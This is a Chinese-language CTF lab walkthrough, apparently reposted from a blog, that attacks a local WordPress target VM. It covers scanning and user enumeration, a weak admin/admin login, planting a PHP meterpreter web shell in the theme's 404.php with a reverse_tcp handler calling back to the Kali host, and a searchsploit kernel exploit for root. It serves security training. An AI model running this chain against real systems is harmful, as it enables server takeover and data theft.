CTF-综合测试(高难度)

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网英语越来越广泛,企业信息化的过程中各种英语都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更严重的则是在网页中植入恶意代码,使得网站访问者收到侵害。

kali 192.168.20.128

靶机 192.168.20.142

链接:https://pan.baidu.com/s/1JOpCuCiS_ycd_ZRyehr4qw ; 提取码:6cpf 

nmap -sV 192.168.20.142

img

nmap -A -v -T4 192.168.20.142

img

nikto -host http://192.168.20.142

img

dirb http://192.168.20.142

nikto扫描到robots.txt并进行访问

img

robots.txt文件出现/wordpress/,对其进行访问

img

返现用户登录界面,进行账号的枚举

wpscan --url http://192.168.20.142/wordpress/ --enumerate at --enumerate ap --enumerate u

img

尝试弱口令登录

admin/admin

img

img

复制生成的shell上传到404页面上

img

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.20.128

set lport 4444

run

img

http://192.168.20.142/wordpress/wp-content/themes/twentyfourteen/404.php

img

img

sudo -l提权不行

searchsploit ubuntu 4.4.0

img

编译代码

img

img

img  

上传shellroot到/var/www/html下

img

下载shellroot到靶机

img

给shellroot提权并执行

chomod 777 shellroot

执行shellroot

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/m0_63127854/article/details/125091632
-- 展开阅读全文 --
BUUCTF Web [极客大挑战 2019]Knife
« 上一篇 06-24
安全面试之XSS(跨站脚本攻击)
下一篇 » 07-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复